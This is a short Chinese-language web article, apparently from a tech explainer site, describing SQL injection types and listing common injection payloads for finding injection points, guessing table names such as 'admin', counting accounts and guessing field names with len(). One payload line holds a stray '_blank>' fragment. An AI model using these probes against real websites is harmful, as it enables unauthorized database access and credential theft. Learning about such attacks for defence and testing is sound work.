sql注入語句
- IT科技
- 關注:6.61K次
sql注入語句是怎樣的呢?下面就讓我們一起來了解一下吧:
sql注入語句其實可以分為三種的,即數字型注入點,語句一般是“select * from表名where id=1 and 1=1”;字符型注入點,語句一般是“select * from表名where name...”;搜索型注入點。
而sql注入也就是通過將SQL命令插入到Web表單提交或是輸入域名、頁面請求的查詢字符串,最終可以達到欺騙服務器執行惡意的SQL命令。
sql注入類型通常是可以按照不同方式進行分類的,比如若是按照注入點類型來進行分類可以分為數字型注入點、字符型注入點、搜索型注入點,若是按照數據提交的方式來分類,可以分為GET 注入、POST 注入、Cookie 注入、HTTP 頭部注入。
當然也可以按照執行效果來分類,可以分為基於布爾的盲注、基於時間的盲注、基於報錯注入、聯合查詢注入。
其中常用的語句有:
1、判斷有無注入點
; and 1=1 and 1=2
2、猜表 通常表的名稱基本上是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判斷是否存在admin這張表
3、猜帳號數目 若是遇到0< 返回正確頁面 1<返回錯誤頁面那麼就説明帳號數目就是1個
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4、猜解字段名稱 在len()括號裏面可以加上所想到的字段名稱。
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名稱name)>0)
and 1=(select count(*) from admin where len(_blank>密碼字段名稱password)>0)
- 文章版權屬於文章作者所有,轉載請註明 https://shqsg.com/zh-mo/dianzi/6myg9z.html